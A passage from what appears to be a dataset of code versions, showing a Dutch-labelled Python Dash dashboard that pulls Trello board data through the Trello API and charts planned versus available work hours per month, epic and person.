'gray'},\n yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})\n bars = []\n if 'Regulier werk' in value:\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in\n data['urenperdagperkaart'].values() if value[config.get(\n 'Custom Field for Categories')] == 'Regulier werk']), 0))\n bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis, name=\n 'Regulier werk', line={'shape': 'spline', 'smoothing': 0.4},\n mode='lines+markers', marker={'symbol': 'triangle-up-open',\n 'size': 10}, stackgroup='one'))\n for categorie in data['arrays'][config.get('Custom Field for Categories')]:\n if categorie in value and categorie != 'Regulier werk':\n if categorie == None:\n categorienaam = 'Geen categorie'\n else:\n categorienaam = categorie\n yaxis = []\n for i in data['arrays']['perioden']:\n 
yaxis.append(round(sum([value['urenperperiode'][i] for\n value in data['urenperdagperkaart'].values() if value[\n config.get('Custom Field for Categories')] == categorie\n ]), 0))\n bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis,\n name=categorienaam, line={'shape': 'spline', 'smoothing': \n 0.4}, mode='lines+markers', marker={'symbol':\n 'triangle-up-open', 'size': 10}, stackgroup='one'))\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in\n data['beschikbareuren'].values()]), 0))\n bars.append(dict(name='Totaal beschikbare uren', mode='lines', x=data[\n 'arrays']['xaxis_months'], y=yaxis, size=10, line={'shape':\n 'spline', 'smoothing': 0.3, 'width': 6, 'color': 'black'}))\n return {'data': bars, 'layout': layout}\n\n\n@app.server.route('/dash/configuration/')\ndef download_file():\n return flask.send_file('./configuration/configuration.txt',\n attachment_filename='configuration.txt', as_attachment=True,\n cache_timeout=0)\n\n\nif __name__ == '__main__':\n app.run_server(debug=False, host='0.0.0.0', port=8050)\n",
"step-5": "import os, json, locale, requests, dash, dash_table, copy, time, flask, base64\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objects as go\nimport pandas as pd\nfrom os import listdir\nimport plotly.figure_factory as ff\nfrom concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor\nfrom dash.dependencies import Input, Output\nfrom datetime import date,datetime,timedelta,time\nfrom dateutil.relativedelta import relativedelta\n \n#--! Check if app is deployed\ntry:\n with open('./configuration/credentials.txt') as json_file:\n credentials = json.load(json_file)\n with open('./configuration/configuration.txt') as json_file:\n config = json.load(json_file)\nexcept:\n raise Exception('Draai eerst deploy.py!')\n \n#--! Set locale\nlocale = locale.setlocale(locale.LC_ALL, 'nl_NL.UTF-8')\n\n#--! Set all global variables\nglobals = {'config': config, 'credentials': credentials, 'styles': {}}\nboard_url = 'https://api.trello.com/1/members/me/boards?fields=name&key='+credentials.get('API key')+ \"&token=\"+credentials.get('API token')\nboards = json.loads(json.dumps(requests.get(board_url).json()))\nglobals['boards'] = boards\nglobals['styles']['maindivs'] = {'box-shadow': '8px 8px 8px grey',\n 'background-image': \"\"\"url('./assets/left.png')\"\"\",\n 'background-repeat': 'no-repeat',\n 'background-position': '0px 0px',\n 'margin-top': '1%', \n 'margin-bottom': '1%', \n 'margin-left': '1%',\n 'margin-right': '1%',\n 'text-align': 'center',\n 'border-radius': '10px' \n }\nglobals['styles']['tabs'] = {'border-style': 'solid',\n 'border-width': '2px',\n 'background': 'rgb(255,255,255)',\n 'background': 'radial-gradient(circle, rgba(255,255,255,1) 0%, rgba(162,162,162,1) 100%, rgba(255,255,255,1) 100%)',\n 'margin-top': '5px', \n 'margin-bottom': '5px', \n 'margin-right': '5px', \n 'margin-left': '5px',\n 'border-radius': '6px'\n }\nglobals['styles']['divgraphs'] = {'background-color': 
'rgba(62,182,235,0.1)',\n 'margin-top': '1%', \n 'margin-bottom': '2%', \n 'margin-left': '1%',\n 'margin-right': '1%',\n 'text-align': 'center',\n 'border-radius': '10px' \n }\nglobals['styles']['dropdowns'] = {'margin-left': '1%', 'margin-right': '2%'}\n\nglobals['graphlayouts']= {'bars': go.Layout(barmode='stack', paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)', hovermode='closest')}\n\n#--! Create function to refresh data\n\ndef get_data(value):\n # set data variable to global to use in other functions\n global data\n global config\n with open('./configuration/configuration.txt') as json_file:\n configfile = json.load(json_file)\n config = configfile.get(value)\n # set all url variables\n keys = \"key=\"+credentials.get('API key')+\"&token=\"+credentials.get('API token')\n trello_base_url = \"https://api.trello.com/1/\"\n board_url = trello_base_url+\"boards/\"+ value \n #board_url = trello_base_url+\"boards/\"+ config.get('Board ID')\n url_cards = board_url+\"?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&\"+keys\n url_lists = board_url+\"/lists?filter=all&\"+keys\n url_customfields = board_url+\"/customFields?\"+keys\n url_labels = board_url+\"/labels?\"+keys\n url_members = board_url+\"/members?\"+keys\n \n # get JSON\n board = json.loads(json.dumps(requests.get(url_cards).json()))\n lists = json.loads(json.dumps(requests.get(url_lists).json()))\n customfields = json.loads(json.dumps(requests.get(url_customfields).json()))\n labels = json.loads(json.dumps(requests.get(url_labels).json()))\n members = json.loads(json.dumps(requests.get(url_members).json()))\n cards = board['cards']\n \n # create function to convert Trello date to datetime\n def dateCalc(date):\n try:\n newdate = datetime.strptime(date[0:19],'%Y-%m-%dT%H:%M:%S')\n return newdate\n except:\n return None\n \n # create dict for custom fields\n customfields_dict = {'date': {},'list': {}, 'text': {}, 'number': {}, 'checkbox': {}}\n for i in 
customfields:\n customfields_dict[i['type']] = {}\n for i in customfields:\n customfields_dict[i['type']][i['id']] = {}\n for i in customfields:\n if i['type'] == 'list':\n customfields_dict[i['type']][i['id']]['name'] = i['name']\n customfields_dict['list'][i['id']]['options'] = {}\n for j in i['options']:\n customfields_dict['list'][i['id']]['options'][j['id']] = j['value'].get('text')\n else:\n customfields_dict[i['type']][i['id']]['name'] = i['name']\n \n # collect all chosen lists\n chosenlists = []\n for i in config.get('Not Started'):\n chosenlists.append(i)\n chosenlists.extend(config.get('Blocked'))\n chosenlists.extend(config.get('Doing'))\n chosenlists.extend(config.get('Done'))\n for i in config.get('Epics'):\n chosenlists.append(i)\n for i in config.get('Always continuing'):\n chosenlists.append(i)\n for i in config.get('List with Epics Done'):\n chosenlists.append(i)\n \n # create function to convert cardid to datetime\n def idtodate(cardid):\n hex = cardid[0:8]\n timestamp = int(hex,16)\n timedate = datetime.fromtimestamp(timestamp)\n return timedate \n\n # create function to get the epic id from the attachment-urls\n def get_epicid(url):\n try:\n if 'epicId=' in url:\n start = url.find('epicId=')+7\n end = url.find('&attachmentId=')\n return url[start:end]\n else:\n pass\n except:\n pass\n\n # create dict for cards\n kaarten = {i['id']: {'Naam': i['name'],\n 'KaartID': i['id'],\n 'ListID': i['idList'],\n 'customfields': i['customFieldItems'],\n 'Aangemaakt': idtodate(i['id']),\n 'labels': [label['name'] for label in i['labels'] if i['labels'] != []],\n 'members': [member['fullName'] for member in members if member['id'] in i['idMembers']],\n 'Sjabloon': i['isTemplate'],\n 'Vervaldatum': dateCalc(i['due']),\n 'Gearchiveerd': i['closed'],\n 'epicid': [get_epicid(j['url']) for j in i['attachments']],\n 'Epic': None,\n 'shortUrl': i['shortUrl']\n } for i in cards}\n \n # remove all attachments except epic-attachments, plus add all members in one string 
field\n for i,j in kaarten.items():\n while None in j['epicid']:\n j['epicid'].remove(None)\n if j['members'] != []:\n j['Leden'] = ''\n for k in j['members']:\n if j['Leden'] == '':\n j['Leden'] += k\n else:\n j['Leden'] += ', '+ k \n else:\n j['Leden'] = None\n del j['members']\n\n # add the custom fields to cards-dict\n if customfields_dict != {}:\n for i,j in customfields_dict.items():\n for k,l in j.items():\n for m,n in kaarten.items():\n n[l['name']] = None\n for i,j in kaarten.items():\n for k in j['customfields']:\n if k['idCustomField'] in customfields_dict['list'].keys():\n j[customfields_dict['list'][k['idCustomField']].get('name')] = customfields_dict['list'][k['idCustomField']]['options'].get(k['idValue'])\n elif k['idCustomField'] in customfields_dict['checkbox'].keys():\n if k['value']['checked'] == 'true':\n j[customfields_dict['checkbox'][k['idCustomField']].get('name')] = True\n else:\n j[customfields_dict['checkbox'][k['idCustomField']].get('name')] = False\n elif k['idCustomField'] in customfields_dict['date'].keys():\n j[customfields_dict['date'][k['idCustomField']].get('name')] = dateCalc(k['value'].get('date')) \n else:\n for key in k['value']:\n j[customfields_dict[key][k['idCustomField']].get('name')] = k['value'].get(key)\n \n # add epicname\n epicIdNameCategory = []\n for i,j in kaarten.items():\n epicIdNameCategory.append((i,j['Naam'],j[config.get('Custom Field for Categories')])) \n for i,j in kaarten.items():\n if j['epicid'] == []:\n j['Epic'] = 'Geen epic'\n j['Categorie'] = None\n else:\n for k in epicIdNameCategory:\n if k[0] == j['epicid'][0]:\n j['Epic'] = k[1]\n j['Categorie'] = k[2]\n del j['epicid']\n\n # add listname and status\n for i,j in kaarten.items():\n for k in lists:\n if j['ListID'] == k['id']: j['Lijst'] = k['name']\n if j['Lijst'] in config.get('Not Started'):\n j['Status'] = 'Niet gestart'\n elif j['Lijst'] in config.get('Doing'):\n j['Status'] = 'Doing'\n elif j['Lijst'] in config.get('Blocked'):\n j['Status'] = 
'Blocked'\n elif j['Lijst'] in config.get('Done'):\n j['Status'] = 'Done'\n elif j['Lijst'] in config.get('Always continuing'):\n j['Status'] = 'Doorlopend'\n elif j['Lijst'] in config.get('Epics'):\n j['Status'] = 'Epics Doing'\n elif j['Lijst'] in config.get('List with Epics Done'):\n j['Status'] = 'Epics Done'\n else:\n j['Status'] = 'Archived'\n del j['customfields']\n del j['ListID']\n for i,j in kaarten.items():\n if j['Gearchiveerd'] == True and j['Status'] != 'Done':\n j['Status'] = 'Archived'\n\n # collect all lists with cards to delete\n liststodelete = []\n for i in lists:\n if i['name'] not in chosenlists:\n liststodelete.append(i['name'])\n\n # collect all cards to delete\n cardstodelete = []\n for i,j in kaarten.items():\n if j['Sjabloon'] == True:\n cardstodelete.append(i)\n elif j['Lijst'] in liststodelete:\n cardstodelete.append(i)\n \n # create hours-dict for available hours\n hours = {}\n for i,j in kaarten.items():\n if j['Lijst'] == config.get('List for hours'):\n hours[j['Naam']] = {config['Custom Field for Starting date']: j[config['Custom Field for Starting date']], config['Custom Field for Ending date']: j[config['Custom Field for Ending date']], config['Custom Field with hours']: j[config['Custom Field with hours']]}\n\n # delete previously collected cards\n for i in cardstodelete:\n if i in kaarten:\n del kaarten[i]\n\n # create list with all dates (6 months history, 1yr in advance)\n tmpdatesdict = {}\n now = datetime.now().date()\n numdays = 365\n numdayshistory = 183\n\n for x in range (0, numdays):\n tmpdatesdict[str(now + timedelta(days = x))] = {}\n for x in range (0,numdayshistory):\n tmpdatesdict[str(now - timedelta(days = x))] = {}\n\n dates = []\n for i in sorted(tmpdatesdict):\n dates.append(i) \n \n # create some global arrays for later use\n arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten.values()])), \n 'xaxis_months': list(dict.fromkeys([i[0:4]+\"-\"+i[5:7]+\"-01\" for i in dates])), \n 'perioden': 
list(dict.fromkeys([i[0:4]+i[5:7] for i in dates])),\n 'statuses': list(dict.fromkeys([card['Status'] for card in kaarten.values()])), \n config.get('Custom Field for Categories'): list(dict.fromkeys([card[config.get('Custom Field for Categories')] for card in kaarten.values()])),\n config.get('Custom Field for Person'): list(dict.fromkeys([card[config.get('Custom Field for Person')] if card[config.get('Custom Field for Person')] != None else 'Geen ' + config.get('Custom Field for Person') for card in kaarten.values() ])),\n \n }\n \n # create dict to calculate the hours per day for each card \n try:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'],\n 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'],\n 'shortUrl': kaart['shortUrl'],\n config.get('Custom Field for Starting date'): kaart[config.get('Custom Field for Starting date')],\n config.get('Custom Field for Ending date'): kaart[config.get('Custom Field for Ending date')],\n 'Gebied': kaart['Gebied'],\n config.get('Custom Field for Person'): kaart[config.get('Custom Field for Person')],\n config.get('Custom Field for Categories'): kaart[config.get('Custom Field for Categories')],\n config.get('Custom Field with hours'): kaart[config.get('Custom Field with hours')],\n 'Cognosrapport': kaart['Cognosrapport'],\n 'Niet meenemen in telling': kaart['Niet meenemen in telling'],\n 'Lijst': kaart['Lijst'],\n 'Status': kaart['Status'],\n 'urenperdag': {i:0 for i in dates},\n 'urenperperiode': {i:0 for i in arrays['perioden']}} \n\n for kaart in kaarten.values()}\n except:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'],\n 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'],\n 'shortUrl': kaart['shortUrl'],\n config.get('Custom Field for Starting date'): kaart[config.get('Custom Field for Starting date')],\n config.get('Custom Field for Ending date'): kaart[config.get('Custom Field for Ending date')],\n config.get('Custom 
Field for Person'): kaart[config.get('Custom Field for Person')],\n config.get('Custom Field for Categories'): kaart[config.get('Custom Field for Categories')],\n config.get('Custom Field with hours'): kaart[config.get('Custom Field with hours')],\n 'Lijst': kaart['Lijst'], \n 'Status': kaart['Status'],\n 'urenperdag': {i:0 for i in dates},\n 'urenperperiode': {i:0 for i in arrays['perioden']}} \n\n for kaart in kaarten.values()}\n \n # do the same for available hours \n beschikbareuren = {key: {'urenperdag': {i:0 for i in dates},\n 'urenperperiode': {i:0 for i in arrays['perioden']}}\n for key in hours.keys()}\n for i in dates:\n datekey = datetime.strptime(i,'%Y-%m-%d').date()\n for k,l in kaarten.items():\n if l['Niet meenemen in telling'] != True:\n try:\n if l[config.get('Custom Field for Starting date')].date() < datekey <= l[config.get('Custom Field for Ending date')].date():\n delta = l[config.get('Custom Field for Ending date')] - l[config.get('Custom Field for Starting date')]\n hoursperday = int(l[config.get('Custom Field with hours')])/int(delta.days) \n urenperdagperkaart[l['Naam']]['urenperdag'][i] = hoursperday\n except:\n pass\n for k,l in hours.items():\n try:\n if l[config.get('Custom Field for Starting date')].date() < datekey <= l[config.get('Custom Field for Ending date')].date():\n hoursperday = int(l[config.get('Custom Field with hours')])/int(30.4) \n beschikbareuren[k]['urenperdag'][i] = hoursperday\n except:\n pass\n \n # calculate the hours per month with the hours per day for each card\n for i,j in urenperdagperkaart.items():\n for k,l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m==k[0:4]+k[5:7]:\n j['urenperperiode'][m] += l\n\n \n # do the same for available hours \n for i,j in beschikbareuren.items():\n for k,l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m==k[0:4]+k[5:7]:\n j['urenperperiode'][m] += l\n\n \n # create data for a dataframe with the hours per month\n dfurenpermaand 
= copy.deepcopy(urenperdagperkaart)\n for i,j in dfurenpermaand.items():\n try:\n j['Geplande uren'] = int(j['Geplande uren'])\n except:\n j['Geplande uren'] = 0\n for k,l in j['urenperperiode'].items():\n j[k] = round(l,2)\n del j['urenperperiode']\n \n # create a bar chart with all cards with no begin and end date\n bars = []\n labelsnietingepland = []\n for j in kaarten.values():\n if j[config.get('Custom Field for Starting date')] == None and j[config.get('Custom Field for Ending date')] == None and j[config.get('Custom Field with hours')] !=None and j['Status'] == 'Niet gestart':\n labelsnietingepland.append(j['Lijst'])\n labelsnietingepland = list(dict.fromkeys(labelsnietingepland))\n for i,j in kaarten.items():\n if j[config.get('Custom Field for Starting date')] == None and j[config.get('Custom Field for Ending date')] == None and j[config.get('Custom Field with hours')] !=None and j['Status'] == 'Niet gestart':\n tmp = []\n for label in labelsnietingepland:\n if j['Lijst'] == label:\n tmp.append(int(j['Geplande uren']))\n else:\n tmp.append(0)\n bars.append(dict(x=labelsnietingepland,\n y=tmp,\n name=j['Naam'],\n type='bar',\n opacity='0.6')) \n \n # create a bar chart with all cards with no begin and end date per epic \n epicbars = []\n tmpepicsforbarchart = {epic: 0 for epic in [name['Naam'] for name in kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}\n tmpepicsforbarchart['Geen epic'] = 0\n for i,j in kaarten.items():\n if j[config.get('Custom Field for Starting date')] == None and j[config.get('Custom Field for Ending date')] == None and j[config.get('Custom Field with hours')] !=None and j['Status'] == 'Niet gestart':\n tmpepicsforbarchart[j['Epic']] += int(j[config.get('Custom Field with hours')])\n\n epicsforbarchart = { k:v for k,v in tmpepicsforbarchart.items() if v!=0 }\n\n epicbars.append(dict(x=[key for key in epicsforbarchart.keys()],\n y=[value for value in epicsforbarchart.values()],\n type='bar',\n text=[value for value 
in epicsforbarchart.values()],\n textposition='outside',\n opacity='0.6'))\n\n # create figure for gauge (planned vs available hours)\n thismonth = datetime.strftime(datetime.now(), '%Y%m')\n nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')\n twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')\n \n arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth,'%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth,'%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths,'%Y%m').strftime('%B'))]\n \n \n gaugegeplandthismonth = round(sum([value for card in urenperdagperkaart.values() for keys,value in card['urenperperiode'].items() if keys==thismonth]))\n gaugegeplandnextmonth = round(sum([value for card in urenperdagperkaart.values() for keys,value in card['urenperperiode'].items() if keys==nextmonth]))\n gaugegeplandtwomonths = round(sum([value for card in urenperdagperkaart.values() for keys,value in card['urenperperiode'].items() if keys==twomonths]))\n\n deltathismonth = round(sum([value for card in beschikbareuren.values() for keys,value in card['urenperperiode'].items() if keys==thismonth]))\n deltanextmonth = round(sum([value for card in beschikbareuren.values() for keys,value in card['urenperperiode'].items() if keys==nextmonth]))\n deltatwomonths = round(sum([value for card in beschikbareuren.values() for keys,value in card['urenperperiode'].items() if keys==twomonths]))\n\n if deltathismonth > gaugegeplandthismonth:\n gaugerangethismonth = deltathismonth + 20\n else:\n gaugerangethismonth = gaugegeplandthismonth + 20\n\n if deltanextmonth > gaugegeplandnextmonth:\n gaugerangenextmonth = deltanextmonth + 20\n else:\n gaugerangenextmonth = gaugegeplandnextmonth + 20\n\n if deltatwomonths > gaugegeplandtwomonths:\n gaugerangetwomonths = deltatwomonths + 20\n else:\n gaugerangetwomonths = gaugegeplandtwomonths + 20\n\n gaugestepsthismonth = {'axis': {'range': [None, gaugerangethismonth]},\n 'bar': 
{'color': '#3eb6eb'},\n 'steps': [\n {'range': [0, deltathismonth*0.5], 'color': '#3deb34'},\n {'range': [deltathismonth*0.5, deltathismonth*0.75], 'color': '#b4eb34'},\n {'range': [deltathismonth*0.75, deltathismonth*0.9], 'color': '#ebb434'},\n {'range': [deltathismonth*0.9, deltathismonth], 'color': '#eb6e34'},\n {'range': [deltathismonth,gaugerangethismonth], 'color': '#eb3434'},\n ],\n 'threshold': {'line': {'color': \"#5c0000\", 'width': 4}, 'thickness': 0.75, 'value': deltathismonth}\n }\n gaugestepsnextmonth = {'axis': {'range': [None, gaugerangenextmonth]},\n 'bar': {'color': '#3eb6eb'},\n 'steps': [\n {'range': [0, deltanextmonth*0.5], 'color': '#3deb34'},\n {'range': [deltanextmonth*0.5, deltanextmonth*0.75], 'color': '#b4eb34'},\n {'range': [deltanextmonth*0.75, deltanextmonth*0.9], 'color': '#ebb434'},\n {'range': [deltanextmonth*0.9, deltanextmonth], 'color': '#eb6e34'},\n {'range': [deltanextmonth,gaugerangenextmonth], 'color': '#eb3434'},\n ],\n 'threshold': {'line': {'color': \"#5c0000\", 'width': 4}, 'thickness': 0.75, 'value': deltanextmonth}\n } \n gaugestepstwomonths = {'axis': {'range': [None, gaugerangetwomonths]},\n 'bar': {'color': '#3eb6eb'},\n 'steps': [\n {'range': [0, deltatwomonths*0.5], 'color': '#3deb34'},\n {'range': [deltatwomonths*0.5, deltatwomonths*0.75], 'color': '#b4eb34'},\n {'range': [deltatwomonths*0.75, deltatwomonths*0.9], 'color': '#ebb434'},\n {'range': [deltatwomonths*0.9, deltatwomonths], 'color': '#eb6e34'},\n {'range': [deltatwomonths,gaugerangetwomonths], 'color': '#eb3434'},\n ],\n 'threshold': {'line': {'color': \"#5c0000\", 'width': 4}, 'thickness': 0.75, 'value': deltatwomonths}\n } \n gaugefig = go.Figure()\n\n gaugefig.add_trace(go.Indicator(\n domain = {'x': [0, 0.3], 'y': [0, 1]},\n value = gaugegeplandthismonth,\n mode = \"gauge+number+delta\",\n title = {'text': \"Totale uren voor \" + datetime.strptime(thismonth,'%Y%m').strftime('%B')},\n delta = {'reference': deltathismonth},\n gauge = 
gaugestepsthismonth\n ))\n gaugefig.add_trace(go.Indicator(\n domain = {'x': [0.35, 0.65], 'y': [0, 1]},\n value = gaugegeplandnextmonth,\n mode = \"gauge+number+delta\",\n title = {'text': \"Totale uren voor \" + datetime.strptime(nextmonth,'%Y%m').strftime('%B')},\n delta = {'reference': deltanextmonth},\n gauge = gaugestepsnextmonth\n )) \n gaugefig.add_trace(go.Indicator(\n domain = {'x': [0.7, 1], 'y': [0, 1]},\n value = gaugegeplandtwomonths,\n mode = \"gauge+number+delta\",\n title = {'text': \"Totale uren voor \" + datetime.strptime(twomonths,'%Y%m').strftime('%B')},\n delta = {'reference': deltatwomonths},\n gauge = gaugestepstwomonths\n )) \n\n gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)', \n plot_bgcolor='rgba(0,0,0,0)',)\n\n\n\n\n graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars, 'gaugefig': gaugefig}\n \n columntypes = {}\n for key, value in kaarten[next(iter(kaarten))].items():\n if 'datum' in key or key == 'Aangemaakt':\n columntypes[key] = 'datetime'\n elif type(value) == int:\n columntypes[key] = 'numeric'\n elif type(value in [str,bool]):\n columntypes[key] = 'text'\n \n columntypesurenpermaand = dict(columntypes)\n \n columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})\n \n data = {'kaarten': kaarten, \n 'arrays': arrays,\n 'urenperdagperkaart': urenperdagperkaart,\n 'beschikbareuren': beschikbareuren,\n 'graphdata': graphdata,\n 'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,\n 'columntypes': columntypes,\n 'urenpermaand': pd.DataFrame(data=dfurenpermaand).T,\n 'columntypesurenpermaand': columntypesurenpermaand\n \n }\n \n }\n \n#--! Create layout function. Only create a simple layout with a few components. 
The rest will be loaded using callbacks.\ndef make_layout():\n return html.Div(\n className='First Div',\n \n children=[\n html.Div(\n style={\n 'font-style': 'italic',\n 'font-weight': 'bold',\n 'border': '10px', \n 'box-shadow': '8px 8px 8px grey',\n 'background': 'rgb(149,193,31)',\n 'background': 'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)',\n 'margin-top': '1%', \n 'margin-bottom': '1%', \n 'margin-right': '1%', \n 'margin-left': '1%',\n 'border-radius': '10px',\n 'text-align': 'center'\n },\n className='Banner',\n children=[\n html.Div(\n style={'display': 'inline-block', 'width': '80%'},\n children=[\n html.H1('Trello borden USD'),\n ]\n ),\n html.Div(\n style={'display': 'inline-block', 'margin-right': '1px'},\n children=[\n html.Img(src=app.get_asset_url('logonop.png'), style={'width': '150px','margin-right': '0px'})\n ]\n )\n ]\n ),\n\n\n html.H5('Kies hieronder een bord', style={'text-align': 'center'}),\n dcc.Dropdown(\n id='dropdown_boards',\n options=[{'label': i['name'], 'value': i['id']} for i in boards],\n value = boards[0]['id'],\n ),\n\n\n html.Button('Data verversen', id='refreshdatabtn', n_clicks=0),\n html.Div(\n id='test'\n )\n ]\n )#/firstdiv \n \n#--! Get CSS files and scripts and set App (including layout) \nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\nexternal_scripts = ['https://cdn.plot.ly/plotly-locale-nl-latest.js']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets,external_scripts=external_scripts, url_base_pathname='/dash/')\napp.layout = make_layout\n#--! Set Dash to suppress callback exceptions, because some callbacks can only be made when the first callback in the main layout has been made.\napp.config['suppress_callback_exceptions'] = True\n\n\n\n#--! Define app callbacks\n\n#---! dropdown_boards\n # This function should be changed when more boards are added. 
For now, only Werkvoorraad is compatible.\n@app.callback(Output('test', 'children'),\n [Input('dropdown_boards', 'value'),\n Input('refreshdatabtn', 'n_clicks')]\n )\ndef create_maindiv(value, n_clicks):\n # first retrieve all data\n get_data(value)\n\n import os\n if os.name=='nt':\n daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')\n else:\n daterefreshed = datetime.strftime(datetime.now(),'%A %-d %B, %H:%M')\n # Return all other divs\n return html.Div(\n className='', \n children=[\n # Show date of refresh\n dcc.Markdown('''**Laatst ververst: **''' + daterefreshed),\n # Create tabs\n dcc.Tabs(\n className='Tabs', \n children=[\n # Create first tab\n \n dcc.Tab(\n label='Gantt charts',\n style=globals['styles']['tabs'], \n children=[\n html.Div(\n className='tab2_div1',\n style=globals['styles']['maindivs'],\n children=[\n html.H3('Uitleg'),\n html.Div(\n style=globals['styles']['divgraphs'],\n children=[ \n dcc.Markdown('''In dit tabblad worden de kaarten in GANTT charts weergegeven. 
Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.'''),\n ]\n ),\n ]\n ), \n html.Div(\n className='tab2_div2',\n style=globals['styles']['maindivs'],\n children=[\n html.H4('Gantt per epic'),\n dcc.Dropdown(\n style = globals['styles']['dropdowns'],\n id='dropdownganttepics',\n options=[{'label':name, 'value':name} for name in data['arrays']['epics']],\n value = [next(iter(data['arrays']['epics']))]\n ),\n html.Div(\n style=globals['styles']['divgraphs'],\n children=[ \n dcc.Graph(id='ganttepics'),\n ]\n ),\n ]\n ),\n html.Div(\n className='tab2_div3',\n style=globals['styles']['maindivs'],\n children=[\n html.H4('Gantt per persoon'),\n dcc.Dropdown(\n style = globals['styles']['dropdowns'],\n id='dropdownganttpersoon',\n options=[{'label':name, 'value':name} for name in data['arrays'][config.get('Custom Field for Person')]],\n ),\n dcc.Dropdown(\n style = globals['styles']['dropdowns'],\n id='dropdownganttpersoonstatus',\n options=[{'label':name, 'value':name} for name in data['arrays']['statuses']],\n value = data['arrays']['statuses'],\n multi=True,\n ),\n \n html.Div(\n style=globals['styles']['divgraphs'],\n children=[ \n dcc.Graph(id='ganttpersoon'),\n ]\n ),\n ]\n ), \n ]\n ),\n dcc.Tab(\n label='Data export',\n style=globals['styles']['tabs'], \n children=[\n html.Div(\n className='tab3_div1',\n style=globals['styles']['maindivs'],\n children=[\n html.H3('Uitleg'),\n html.Div(\n style=globals['styles']['divgraphs'],\n children=[ \n dcc.Markdown('''Hieronder kan de data worden geëxporteerd. Via de buttons 'Export' downloadt je een excelbestand.'''),\n dcc.Markdown('''In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. 
Kies dan de velden, filter daarna en klik op 'Export'.'''),\n ]\n ),\n ]\n ), \n html.Div(\n className='tab3_div2',\n style=globals['styles']['maindivs'],\n children=[\n html.H4('Platte dump'),\n dcc.Markdown('Deze tabel laat de platte data zien, zoals in Trello gevuld.'),\n dash_table.DataTable(\n id='table_plattedump',\n \n columns=[{'name': i, 'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable': True} for i in data['dfs']['kaartendf'].columns if i in data['dfs']['columntypes'].keys()],\n data=data['dfs']['kaartendf'].to_dict('records'),\n hidden_columns=[i for i in data['dfs']['columntypes']],\n export_format='xlsx',\n export_headers='display',\n export_columns='all',\n filter_action=\"native\",\n sort_action=\"native\",\n sort_mode=\"multi\", \n style_table={'overflowX': 'scroll'},\n style_header={'backgroundColor': 'rgba(62,182,235,0.6)','color': 'black', 'fontWeight': 'bold', 'fontFamily': 'Arial'},\n style_cell = {'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black','text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'}, \n )\n\n ]\n ),\n html.Div(\n className='tab3_div3',\n style=globals['styles']['maindivs'],\n children=[\n html.H4('Uren per maand'),\n \n dcc.Markdown('Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'),\n dcc.Markdown('Ook hierin kan gefilterd worden. 
filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'), \n dash_table.DataTable(\n id='table_urenpermaand',\n columns=[{'name': i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i), 'hideable': True} for i in data['dfs']['urenpermaand'].columns if i in data['dfs']['columntypesurenpermaand'].keys()],\n data=data['dfs']['urenpermaand'].to_dict('records'),\n hidden_columns=[i for i in data['dfs']['columntypesurenpermaand']],\n export_format='xlsx',\n export_headers='display',\n export_columns='all',\n filter_action=\"native\",\n sort_action=\"native\",\n sort_mode=\"multi\", \n style_header={'backgroundColor': 'rgba(62,182,235,0.6)','color': 'black', 'fontWeight': 'bold', 'fontFamily': 'Arial'},\n style_cell = {'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black','text-align': 'left', 'fontFamily': 'Arial'}, \n )\n\n\n ]\n ), \n ]\n ),\n dcc.Tab(\n label='Langetermijnplanning',\n style=globals['styles']['tabs'], \n children=[\n html.Div(\n className='maindivs',\n style=globals['styles']['maindivs'],\n children=[\n html.H3('Uitleg'),\n html.Div(\n style=globals['styles']['divgraphs'],\n children=[ \n dcc.Markdown('''In dit tabblad wordt een langetermijnplanning getoond.'''),\n dcc.Markdown('''De focus hierbij ligt vooral op de categorieen.'''),\n ]\n ),\n ]\n ), \n html.Div(\n className='maindivs',\n style=globals['styles']['maindivs'],\n children=[\n html.H4('Ingeplande uren per categorie'),\n dcc.Dropdown(\n style = globals['styles']['dropdowns'],\n id='dropdownurenpermaand',\n options=[{'label':name, 'value':name} for name in data['arrays'][config.get('Custom Field for Categories')] if 